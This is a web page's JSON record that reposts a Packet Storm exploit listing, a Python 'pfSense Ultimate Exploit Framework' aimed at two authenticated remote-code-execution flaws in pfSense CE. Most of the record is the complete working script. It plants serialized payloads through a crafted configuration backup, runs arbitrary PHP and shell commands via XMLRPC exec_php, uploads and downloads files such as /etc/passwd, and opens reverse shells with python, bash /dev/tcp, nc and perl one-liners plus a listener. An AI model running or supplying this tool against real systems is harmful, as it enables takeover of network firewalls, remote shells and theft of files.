{"id":41408,"date":"2026-02-18T12:49:55","date_gmt":"2026-02-18T12:49:55","guid":{"rendered":"http:\/\/localhost\/?p=41408"},"modified":"2026-02-18T12:49:55","modified_gmt":"2026-02-18T12:49:55","slug":"pfsense-ultimate-exploit-framework","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41408","title":{"rendered":"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799"},"content":{"rendered":"

{“lastseen”:”2026-02-18T17:37:05″,”description”:”This Python script is an exploitation framework targeting two authenticated remote code execution vulnerabilities in pfSense. One exploit vector is an unsafe deserialization in pfSense CE version 2.7.2 and another is related to XMLRPC execphp abuse in…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 pfSense Ultimate Exploit Framework”,”source”:””,”references”:””,”id”:”PACKETSTORM:215799″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69690″,”CVE-2025-69691″],”sourceData”:”=============================================================================================================================================\\n | # Title : pfSense Ultimate Exploit Framework \u2013 Authenticated RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.pfsense.org\/download\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This Python script is an exploitation framework targeting two authenticated Remote Code Execution (RCE) vulnerabilities in pfSense:\\n \\n CVE\u20112025\u201169690 \u2013 Unsafe Deserialization in pfSense CE 2.7.2\\n \\n CVE\u20112025\u201169691 \u2013 XMLRPC exec_php Abuse in pfSense CE 2.8.0\\n \\n The framework provides a unified interface to:\\n \\n Execute system commands remotely\\n \\n Obtain reverse shells\\n \\n Upload and download files\\n \\n Launch an interactive shell for pfSense CE 2.7.2 \u2192 CVE\u20112025\u201169690 \\n pfSense CE 2.8.0 \u2192 CVE\u20112025\u201169691\\n \\n Automatically detect the best exploit path\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import base64\\n import sys\\n import os\\n import time\\n import argparse\\n import urllib3\\n import xml.etree.ElementTree as ET\\n import random\\n import string\\n import socket\\n import threading\\n import subprocess\\n from typing import Optional, Dict, Any, Tuple\\n from datetime import datetime\\n from colorama import init, Fore, Style, Back\\n \\n \\n init(autoreset=True)\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n \\n BANNER = f\\”\\”\\”\\n {Fore.RED}\\n \u2554{‘\u2550’*61} \u2551 \\n \u2551{Fore.CYAN} PfSense Ultimate Exploit Framework v1.0{Fore.RED} \u2551\\n \u2551{Fore.CYAN} CVE-2025-69690 | CVE-2025-69691{Fore.RED} \u2551\\n \u2551{Fore.CYAN} Researcher: indoushka{Fore.RED} \u2551\\n \u255a{‘\u2550’*60}\u255d\\n {Style.RESET_ALL}\\”\\”\\”\\n \\n \\n class Colors:\\n \\”\\”\\”ANSI color codes for terminal output\\”\\”\\”\\n HEADER = ‘\\\\033[95m’\\n BLUE = ‘\\\\033[94m’\\n GREEN = ‘\\\\033[92m’\\n YELLOW = ‘\\\\033[93m’\\n RED = ‘\\\\033[91m’\\n END = ‘\\\\033[0m’\\n BOLD = ‘\\\\033[1m’\\n UNDERLINE = ‘\\\\033[4m’\\n \\n def print_success(msg):\\n print(f\\”{Fore.GREEN}[] {msg}{Style.RESET_ALL}\\”)\\n \\n def print_error(msg):\\n print(f\\”{Fore.RED}[] {msg}{Style.RESET_ALL}\\”)\\n \\n def print_info(msg):\\n print(f\\”{Fore.BLUE}[] {msg}{Style.RESET_ALL}\\”)\\n \\n def print_warning(msg):\\n print(f\\”{Fore.YELLOW}[] {msg}{Style.RESET_ALL}\\”)\\n \\n def print_banner():\\n \\”\\”\\”Display the tool banner\\”\\”\\”\\n print(BANNER)\\n \\n \\n def generate_random_string(length=8):\\n \\”\\”\\”Generate random string for filenames\\”\\”\\”\\n return ”.join(random.choices(string.ascii_lowercase + string.digits, k=length))\\n \\n class CVE202569690:\\n \\”\\”\\”Unsafe Deserialization RCE – pfSense CE 2.7.2\\”\\”\\”\\n \\n def __init__(self, target, username, password, ssl_verify=False):\\n self.target = target.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.ssl_verify = ssl_verify\\n self.session = requests.Session()\\n self.session.auth = (username, password)\\n self.session.verify = ssl_verify\\n \\n def create_serialized_payload(self, command):\\n \\”\\”\\”\\n Create malicious serialized object with command\\n \\”\\”\\”\\n payload = f’O:23:\\”pfsense_module_installer\\”:1:{{s:17:\\”*post_reboot_commands\\”;a:1:{{i:0;s:{len(command)}:\\”{command}\\”;}}}}’\\n return payload\\n \\n def create_reverse_shell_payload(self, lhost, lport):\\n \\”\\”\\”\\n Generate reverse shell command\\n \\”\\”\\”\\n shells = [\\n \\n f\\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{lhost}\\\\\\”,{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”])’\\”,\\n f\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261\\”,\\n f\\”nc -e \/bin\/sh {lhost} {lport}\\”,\\n f\\”perl -e ‘use Socket;$i=\\\\\\”{lhost}\\\\\\”;$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\\\\”tcp\\\\\\”));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDOUT,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDERR,\\\\\\”\\u003e\\u0026S\\\\\\”);exec(\\\\\\”\/bin\/sh -i\\\\\\”);}}’\\”\\n ]\\n return shells[0] \\n \\n def create_malicious_backup(self, command, output_file=None):\\n \\”\\”\\”\\n Create malicious XML backup file\\n \\”\\”\\”\\n if output_file is None:\\n output_file = f\\”malicious_{generate_random_string()}.xml\\”\\n \\n serialized_payload = self.create_serialized_payload(command)\\n b64_payload = base64.b64encode(serialized_payload.encode()).decode()\\n \\n xml_content = f”’\\u003c?xml version=\\”1.0\\”?\\u003e\\n \\u003cpfsense\\u003e\\n \\u003cversion\\u003e17.0\\u003c\/version\\u003e\\n \\u003clast_backup\\u003eexploit_{generate_random_string()}\\u003c\/last_backup\\u003e\\n \\u003cbackup_system\\u003e\\n \\u003cconfiguration\\u003e\\n \\u003cserialized_data\\u003e{b64_payload}\\u003c\/serialized_data\\u003e\\n \\u003c\/configuration\\u003e\\n \\u003c\/backup_system\\u003e\\n \\u003cinstalledpackages\\u003e\\n \\u003cpackage\\u003e\\n \\u003cname\\u003esystem_patches\\u003c\/name\\u003e\\n \\u003cdescr\\u003e\\u003c![CDATA[{serialized_payload}]]\\u003e\\u003c\/descr\\u003e\\n \\u003c\/package\\u003e\\n \\u003c\/installedpackages\\u003e\\n \\u003c\/pfsense\\u003e”’\\n \\n with open(output_file, ‘w’) as f:\\n f.write(xml_content)\\n \\n return output_file\\n \\n def upload_and_execute(self, backup_file):\\n \\”\\”\\”\\n Upload malicious backup and trigger execution\\n \\”\\”\\”\\n print_info(f\\”Uploading malicious backup: {backup_file}\\”)\\n \\n try:\\n \\n login_url = f\\”{self.target}\/index.php\\”\\n response = self.session.get(login_url)\\n \\n csrf_token = None\\n if ‘__csrf_magic’ in response.text:\\n import re\\n csrf_match = re.search(r’name=\\”__csrf_magic\\” value=\\”([^\\”]+)\\”‘, response.text)\\n if csrf_match:\\n csrf_token = csrf_match.group(1)\\n \\n upload_url = f\\”{self.target}\/diag_backup.php\\”\\n \\n with open(backup_file, ‘rb’) as f:\\n files = {\\n ‘conffile’: (backup_file, f, ‘application\/xml’)\\n }\\n \\n data = {}\\n if csrf_token:\\n data[‘__csrf_magic’] = csrf_token\\n \\n response = self.session.post(upload_url, files=files, data=data)\\n \\n if response.status_code == 200:\\n print_success(\\”Backup uploaded successfully\\”)\\n \\n restore_data = {\\n ‘restore’: ‘Restore Configuration’\\n }\\n if csrf_token:\\n restore_data[‘__csrf_magic’] = csrf_token\\n \\n response = self.session.post(upload_url, data=restore_data)\\n \\n if response.status_code == 200:\\n print_success(\\”Restore triggered – Command should execute on next reboot\\”)\\n print_warning(\\”Note: Command executes after reboot via post_reboot_commands\\”)\\n return True\\n else:\\n print_error(f\\”Failed to trigger restore: {response.status_code}\\”)\\n return False\\n else:\\n print_error(f\\”Failed to upload backup: {response.status_code}\\”)\\n return False\\n \\n except Exception as e:\\n print_error(f\\”Error during exploitation: {str(e)}\\”)\\n return False\\n \\n def exploit(self, command, is_reverse_shell=False, lhost=None, lport=None):\\n \\”\\”\\”\\n Main exploit method\\n \\”\\”\\”\\n print_info(f\\”Target: {self.target}\\”)\\n print_info(f\\”Username: {self.username}\\”)\\n \\n if is_reverse_shell and lhost and lport:\\n command = self.create_reverse_shell_payload(lhost, lport)\\n print_info(f\\”Reverse shell to {lhost}:{lport}\\”)\\n else:\\n print_info(f\\”Command to execute: {command}\\”)\\n \\n backup_file = self.create_malicious_backup(command)\\n print_success(f\\”Created malicious backup: {backup_file}\\”)\\n \\n result = self.upload_and_execute(backup_file)\\n \\n try:\\n os.remove(backup_file)\\n except:\\n pass\\n \\n return result\\n \\n class CVE202569691:\\n \\”\\”\\”XMLRPC exec_php RCE – pfSense CE 2.8.0\\”\\”\\”\\n \\n def __init__(self, target, username, password, ssl_verify=False):\\n self.target = target.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.ssl_verify = ssl_verify\\n self.session = requests.Session()\\n self.session.auth = (username, password)\\n self.session.verify = ssl_verify\\n self.xmlrpc_url = f\\”{self.target}\/xmlrpc.php\\”\\n \\n def exec_php(self, php_code):\\n \\”\\”\\”\\n Execute PHP code via XMLRPC\\n \\”\\”\\”\\n xml_payload = f”’\\u003c?xml version=\\”1.0\\”?\\u003e\\n \\u003cmethodCall\\u003e\\n \\u003cmethodName\\u003epfsense.exec_php\\u003c\/methodName\\u003e\\n \\u003cparams\\u003e\\n \\u003cparam\\u003e\\n \\u003cvalue\\u003e\\u003cstring\\u003e{php_code}\\u003c\/string\\u003e\\u003c\/value\\u003e\\n \\u003c\/param\\u003e\\n \\u003c\/params\\u003e\\n \\u003c\/methodCall\\u003e”’\\n \\n try:\\n response = self.session.post(\\n self.xmlrpc_url,\\n data=xml_payload,\\n headers={‘Content-Type’: ‘text\/xml’},\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n return self._parse_response(response.text)\\n else:\\n return f\\”HTTP Error: {response.status_code}\\”\\n \\n except Exception as e:\\n return f\\”Connection Error: {str(e)}\\”\\n \\n def _parse_response(self, xml_response):\\n \\”\\”\\”\\n Parse XMLRPC response\\n \\”\\”\\”\\n try:\\n root = ET.fromstring(xml_response)\\n for param in root.findall(‘.\/\/param\/value\/string’):\\n return param.text\\n for param in root.findall(‘.\/\/param\/value’):\\n if param.text:\\n return param.text\\n return xml_response\\n except:\\n return xml_response\\n \\n def exec_command(self, command):\\n \\”\\”\\”\\n Execute system command via PHP\\n \\”\\”\\”\\n php_code = f”’\\u003c?php\\n $output = shell_exec(\\”{command} 2\\u003e\\u00261\\”);\\n echo base64_encode($output);\\n ?\\u003e”’\\n \\n result = self.exec_php(php_code)\\n \\n if result and not result.startswith((‘HTTP Error’, ‘Connection Error’)):\\n try:\\n decoded = base64.b64decode(result).decode(‘utf-8′, errors=’ignore’)\\n return decoded\\n except:\\n return result\\n return result\\n \\n def upload_file(self, local_file, remote_path):\\n \\”\\”\\”\\n Upload file to target system\\n \\”\\”\\”\\n if not os.path.exists(local_file):\\n return False, \\”Local file not found\\”\\n \\n with open(local_file, ‘rb’) as f:\\n content = f.read()\\n \\n b64_content = base64.b64encode(content).decode()\\n \\n php_code = f”’\\u003c?php\\n file_put_contents(\\”{remote_path}\\”, base64_decode(\\”{b64_content}\\”));\\n echo \\”Uploaded: \\” . filesize(\\”{remote_path}\\”) . \\” bytes\\”;\\n ?\\u003e”’\\n \\n result = self.exec_php(php_code)\\n return True, result\\n \\n def download_file(self, remote_file, local_file=None):\\n \\”\\”\\”\\n Download file from target system\\n \\”\\”\\”\\n if local_file is None:\\n local_file = os.path.basename(remote_file)\\n \\n php_code = f”’\\u003c?php\\n if (file_exists(\\”{remote_file}\\”)) {{\\n echo base64_encode(file_get_contents(\\”{remote_file}\\”));\\n }} else {{\\n echo \\”FILE_NOT_FOUND\\”;\\n }}\\n ?\\u003e”’\\n \\n result = self.exec_php(php_code)\\n \\n if result == \\”FILE_NOT_FOUND\\”:\\n return False, \\”Remote file not found\\”\\n \\n try:\\n content = base64.b64decode(result)\\n with open(local_file, ‘wb’) as f:\\n f.write(content)\\n return True, f\\”Downloaded {len(content)} bytes to {local_file}\\”\\n except:\\n return False, \\”Failed to decode\/download file\\”\\n \\n def create_reverse_shell(self, lhost, lport):\\n \\”\\”\\”\\n Create PHP reverse shell\\n \\”\\”\\”\\n php_shell = f”’\\u003c?php\\n set_time_limit(0);\\n $ip = ‘{lhost}’;\\n $port = {lport};\\n $sock = fsockopen($ip, $port);\\n $descriptorspec = array(\\n 0 =\\u003e $sock,\\n 1 =\\u003e $sock,\\n 2 =\\u003e $sock\\n );\\n $process = proc_open(‘\/bin\/sh -i’, $descriptorspec, $pipes);\\n proc_close($process);\\n ?\\u003e”’\\n \\n return self.exec_php(php_shell)\\n \\n def interactive_shell(self):\\n \\”\\”\\”\\n Interactive command shell\\n \\”\\”\\”\\n print_info(\\”Interactive shell (type ‘exit’ to quit)\\”)\\n print_info(\\”Commands are executed on the target system\\”)\\n \\n while True:\\n try:\\n cmd = input(f\\”{Fore.GREEN}pfsense\\u003e {Style.RESET_ALL}\\”)\\n \\n if cmd.lower() in [‘exit’, ‘quit’]:\\n break\\n \\n if cmd.lower().startswith(‘upload ‘):\\n parts = cmd.split()\\n if len(parts) \\u003e= 3:\\n local = parts[1]\\n remote = parts[2]\\n success, msg = self.upload_file(local, remote)\\n if success:\\n print_success(msg)\\n else:\\n print_error(msg)\\n else:\\n print_error(\\”Usage: upload \\u003clocal_file\\u003e \\u003cremote_path\\u003e\\”)\\n \\n elif cmd.lower().startswith(‘download ‘):\\n parts = cmd.split()\\n if len(parts) \\u003e= 2:\\n remote = parts[1]\\n local = parts[2] if len(parts) \\u003e= 3 else None\\n success, msg = self.download_file(remote, local)\\n if success:\\n print_success(msg)\\n else:\\n print_error(msg)\\n else:\\n print_error(\\”Usage: download \\u003cremote_file\\u003e [local_file]\\”)\\n \\n elif cmd.strip():\\n result = self.exec_command(cmd)\\n print(result)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\nExiting…\\”)\\n break\\n except Exception as e:\\n print_error(f\\”Error: {str(e)}\\”)\\n \\n def exploit(self, command=None, interactive=False, reverse_shell=None, upload=None, download=None):\\n \\”\\”\\”\\n Main exploit method\\n \\”\\”\\”\\n print_info(f\\”Target: {self.target}\\”)\\n print_info(f\\”XMLRPC URL: {self.xmlrpc_url}\\”)\\n \\n test_result = self.exec_php(‘echo \\”Connection Successful\\”;’)\\n if \\”Successful\\” in str(test_result):\\n print_success(\\”Connected to XMLRPC interface\\”)\\n else:\\n print_error(\\”Failed to connect to XMLRPC\\”)\\n print_error(f\\”Response: {test_result}\\”)\\n return False\\n \\n if reverse_shell:\\n lhost, lport = reverse_shell\\n print_info(f\\”Attempting reverse shell to {lhost}:{lport}\\”)\\n print_warning(\\”Make sure your listener is running: nc -lvnp {lport}\\”)\\n self.create_reverse_shell(lhost, lport)\\n \\n elif upload:\\n local, remote = upload\\n print_info(f\\”Uploading {local} to {remote}\\”)\\n success, msg = self.upload_file(local, remote)\\n if success:\\n print_success(msg)\\n else:\\n print_error(msg)\\n \\n elif download:\\n remote, local = download if len(download) == 2 else (download[0], None)\\n print_info(f\\”Downloading {remote}\\”)\\n success, msg = self.download_file(remote, local)\\n if success:\\n print_success(msg)\\n else:\\n print_error(msg)\\n \\n elif interactive:\\n self.interactive_shell()\\n \\n elif command:\\n print_info(f\\”Executing command: {command}\\”)\\n result = self.exec_command(command)\\n print(result)\\n \\n else:\\n \\n print_info(\\”Gathering system information…\\”)\\n commands = [\\n \\”uname -a\\”,\\n \\”cat \/etc\/version\\”,\\n \\”id\\”,\\n \\”ifconfig\\”,\\n \\”netstat -an | grep LISTEN\\”\\n ]\\n \\n for cmd in commands:\\n print_info(f\\”$ {cmd}\\”)\\n result = self.exec_command(cmd)\\n print(result)\\n print(\\”-\\” * 40)\\n \\n return True\\n \\n class ReverseShellListener:\\n \\”\\”\\”Simple reverse shell listener\\”\\”\\”\\n \\n def __init__(self, port, lhost=’0.0.0.0′):\\n self.port = port\\n self.lhost = lhost\\n \\n def start(self):\\n \\”\\”\\”Start listening for reverse shell\\”\\”\\”\\n print_info(f\\”Starting listener on {self.lhost}:{self.port}\\”)\\n \\n try:\\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n server.bind((self.lhost, self.port))\\n server.listen(1)\\n \\n print_info(f\\”Waiting for connection…\\”)\\n client, addr = server.accept()\\n print_success(f\\”Connection from {addr[0]}:{addr[1]}\\”)\\n \\n while True:\\n try:\\n \\n client.settimeout(1.0)\\n data = client.recv(1024)\\n if data:\\n print(data.decode(), end=”)\\n \\n cmd = input()\\n if cmd.lower() == ‘exit’:\\n client.send(b’exit\\\\n’)\\n break\\n client.send((cmd + ‘\\\\n’).encode())\\n \\n except socket.timeout:\\n continue\\n except KeyboardInterrupt:\\n print(\\”\\\\nClosing connection…\\”)\\n break\\n except Exception as e:\\n print_error(f\\”Error: {str(e)}\\”)\\n break\\n \\n client.close()\\n server.close()\\n \\n except Exception as e:\\n print_error(f\\”Listener error: {str(e)}\\”)\\n \\n class PfSenseExploitFramework:\\n \\”\\”\\”Unified exploit framework for pfSense CVEs\\”\\”\\”\\n \\n def __init__(self):\\n self.target = None\\n self.username = None\\n self.password = None\\n self.ssl_verify = False\\n self.cve_690 = None\\n self.cve_691 = None\\n \\n def setup(self, target, username, password, ssl_verify=False):\\n \\”\\”\\”Initialize the framework with target information\\”\\”\\”\\n self.target = target\\n self.username = username\\n self.password = password\\n self.ssl_verify = ssl_verify\\n \\n # Initialize exploit classes\\n self.cve_690 = CVE202569690(target, username, password, ssl_verify)\\n self.cve_691 = CVE202569691(target, username, password, ssl_verify)\\n \\n print_success(f\\”Framework initialized for target: {target}\\”)\\n \\n def detect_version(self):\\n \\”\\”\\”Attempt to detect pfSense version\\”\\”\\”\\n print_info(\\”Detecting pfSense version…\\”)\\n \\n result = self.cve_691.exec_command(\\”cat \/etc\/version\\”)\\n if result and not result.startswith((‘HTTP Error’, ‘Connection Error’)):\\n version = result.strip()\\n print_success(f\\”Detected version: {version}\\”)\\n return version\\n \\n return None\\n \\n def auto_exploit(self):\\n \\”\\”\\”Automatically choose the best exploit based on detection\\”\\”\\”\\n print_info(\\”Attempting automatic exploitation…\\”)\\n \\n version = self.detect_version()\\n \\n if version:\\n if \\”2.7.2\\” in version:\\n print_info(\\”Target appears to be pfSense 2.7.2 – Using CVE-2025-69690\\”)\\n return \\”690\\”\\n elif \\”2.8.0\\” in version:\\n print_info(\\”Target appears to be pfSense 2.8.0 – Using CVE-2025-69691\\”)\\n return \\”691\\”\\n \\n print_warning(\\”Version detection failed, trying CVE-2025-69691…\\”)\\n test = self.cve_691.exec_command(\\”echo test\\”)\\n if test and \\”test\\” in test:\\n print_success(\\”CVE-2025-69691 works!\\”)\\n return \\”691\\”\\n \\n return None\\n \\n def run_exploit_690(self, command, is_reverse_shell=False, lhost=None, lport=None):\\n \\”\\”\\”Run CVE-2025-69690 exploit\\”\\”\\”\\n return self.cve_690.exploit(command, is_reverse_shell, lhost, lport)\\n \\n def run_exploit_691(self, command=None, interactive=False, reverse_shell=None, \\n upload=None, download=None):\\n \\”\\”\\”Run CVE-2025-69691 exploit\\”\\”\\”\\n return self.cve_691.exploit(command, interactive, reverse_shell, upload, download)\\n \\n def main():\\n \\”\\”\\”Main entry point\\”\\”\\”\\n print_banner()\\n \\n parser = argparse.ArgumentParser(\\n description=’PfSense Ultimate Exploit Framework – CVE-2025-69690 \\u0026 CVE-2025-69691′,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=”’\\n Examples:\\n # Basic command execution (auto-detect exploit)\\n python3 pfsense_exploit.py https:\/\/192.168.1.1 -u admin -p pfsense -c \\”id\\”\\n \\n # Interactive shell using CVE-2025-69691\\n python3 pfsense_exploit.py https:\/\/192.168.1.1 -u admin -p pfsense -i\\n \\n # Reverse shell using CVE-2025-69690\\n python3 pfsense_exploit.py https:\/\/192.168.1.1 -u admin -p pfsense -r 192.168.1.100 4444 –cve 690\\n \\n # Upload file using CVE-2025-69691\\n python3 pfsense_exploit.py https:\/\/192.168.1.1 -u admin -p pfsense –upload shell.php \/tmp\/shell.php\\n \\n # Download file using CVE-2025-69691\\n python3 pfsense_exploit.py https:\/\/192.168.1.1 -u admin -p pfsense –download \/etc\/passwd\\n \\n # Listen for reverse shell\\n python3 pfsense_exploit.py –listen 4444\\n ”’\\n )\\n \\n parser.add_argument(‘target’, nargs=’?’, help=’Target URL (e.g., https:\/\/192.168.1.1)’)\\n parser.add_argument(‘-u’, ‘–username’, default=’admin’, help=’Username (default: admin)’)\\n parser.add_argument(‘-p’, ‘–password’, default=’pfsense’, help=’Password (default: pfsense)’)\\n parser.add_argument(‘–no-ssl-verify’, action=’store_true’, help=’Disable SSL verification’)\\n parser.add_argument(‘–cve’, choices=[‘690’, ‘691’, ‘auto’], default=’auto’,\\n help=’Choose specific CVE to exploit (default: auto-detect)’)\\n \\n parser.add_argument(‘-c’, ‘–command’, help=’Single command to execute’)\\n parser.add_argument(‘-i’, ‘–interactive’, action=’store_true’, \\n help=’Interactive shell (CVE-2025-69691 only)’)\\n parser.add_argument(‘-r’, ‘–reverse’, nargs=2, metavar=(‘LHOST’, ‘LPORT’),\\n help=’Reverse shell (e.g., -r 192.168.1.100 4444)’)\\n \\n parser.add_argument(‘–upload’, nargs=2, metavar=(‘LOCAL’, ‘REMOTE’),\\n help=’Upload file to target’)\\n parser.add_argument(‘–download’, nargs=’+’, metavar=(‘REMOTE’, ‘[LOCAL]’),\\n help=’Download file from target’)\\n \\n parser.add_argument(‘–listen’, type=int, metavar=’PORT’,\\n help=’Start reverse shell listener on specified port’)\\n \\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’, help=’Verbose output’)\\n \\n args = parser.parse_args()\\n \\n if args.listen and not args.target:\\n listener = ReverseShellListener(args.listen)\\n listener.start()\\n return\\n \\n if not args.target:\\n parser.print_help()\\n print_error(\\”Target URL is required unless using –listen\\”)\\n sys.exit(1)\\n \\n framework = PfSenseExploitFramework()\\n framework.setup(\\n args.target,\\n args.username,\\n args.password,\\n not args.no_ssl_verify\\n )\\n \\n cve_to_use = args.cve\\n if cve_to_use == ‘auto’:\\n cve_to_use = framework.auto_exploit()\\n if not cve_to_use:\\n print_error(\\”Could not automatically determine exploit type\\”)\\n print_info(\\”Try specifying with –cve 690 or –cve 691\\”)\\n sys.exit(1)\\n \\n print_info(f\\”Using CVE-2025-{cve_to_use}\\”)\\n \\n if cve_to_use == ‘690’:\\n if args.interactive:\\n print_warning(\\”Interactive shell not available for CVE-2025-69690\\”)\\n print_info(\\”Use –command for single commands or –reverse for reverse shell\\”)\\n \\n if args.reverse:\\n lhost, lport = args.reverse\\n framework.run_exploit_690(None, is_reverse_shell=True, \\n lhost=lhost, lport=lport)\\n print_info(f\\”Check your listener on {lport}\\”)\\n \\n elif args.command:\\n framework.run_exploit_690(args.command)\\n \\n elif args.upload or args.download:\\n print_warning(\\”File operations not available for CVE-2025-69690\\”)\\n \\n else:\\n \\n framework.run_exploit_690(\\”id\\”)\\n \\n elif cve_to_use == ‘691’:\\n if args.reverse:\\n framework.run_exploit_691(reverse_shell=args.reverse)\\n elif args.upload:\\n framework.run_exploit_691(upload=args.upload)\\n elif args.download:\\n framework.run_exploit_691(download=args.download)\\n elif args.interactive:\\n framework.run_exploit_691(interactive=True)\\n elif args.command:\\n framework.run_exploit_691(command=args.command)\\n else:\\n \\n framework.run_exploit_691()\\n \\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(f\\”\\\\n{Fore.YELLOW}[!] Interrupted by user{Style.RESET_ALL}\\”)\\n sys.exit(0)\\n except Exception as e:\\n print_error(f\\”Unexpected error: {str(e)}\\”)\\n if ‘verbose’ in locals() and args.verbose:\\n import traceback\\n traceback.print_exc()\\n sys.exit(1)\\n \\t\\t\\n \\t\\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215799″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215799\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-18T17:37:05″,”description”:”This Python script is an exploitation framework targeting two authenticated remote code execution vulnerabilities in pfSense. One exploit vector is an unsafe deserialization in pfSense…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41408","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41408\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-18T17:37:05″,”description”:”This Python script is an exploitation framework targeting two authenticated remote code execution vulnerabilities in pfSense. One exploit vector is an unsafe deserialization in pfSense...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41408\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:55+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799\",\"datePublished\":\"2026-02-18T12:49:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408\"},\"wordCount\":3740,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41408#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41408\",\"name\":\"\ud83d\udcc4 pfSense Ultimate Exploit Framework_PACKETSTORM:215799 - zero 